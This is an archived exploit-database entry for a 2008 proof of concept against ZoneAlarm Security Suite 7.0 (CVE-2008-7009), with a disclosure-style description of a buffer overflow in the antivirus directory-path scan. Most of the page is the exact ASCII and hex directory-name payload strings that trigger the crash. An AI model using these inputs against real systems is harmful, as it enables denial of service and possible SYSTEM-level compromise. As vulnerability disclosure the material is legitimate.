[] NeoSense
E X P L O I T S
title author type platform port cve id

ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow (PoC)

Author: Juan Pablo Lopez Yacubian
type: dos
platform: windows
port: 
date_added: 2008-09-11 
date_updated: 2014-03-19 
verified: 1 
codes: CVE-2008-7009;OSVDB-48097 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/31124/info

ZoneAlarm Security Suite is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input when performing virus scans on long directory paths.

Remote attackers may leverage this issue to execute arbitrary code with SYSTEM-level privileges and gain complete access to the vulnerable computer. Failed attacks will cause denial-of-service conditions.

This issue affects ZoneAlarm Security Suite 7.0.483.000; other versions may also be affected.

To demonstrate this issue, construct multiple nested subdirectories, naming the root directory string1 below, and each nested directory string2:

string1:
ASCII: ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? ? A ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41

string2:
ASCII: ???????????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.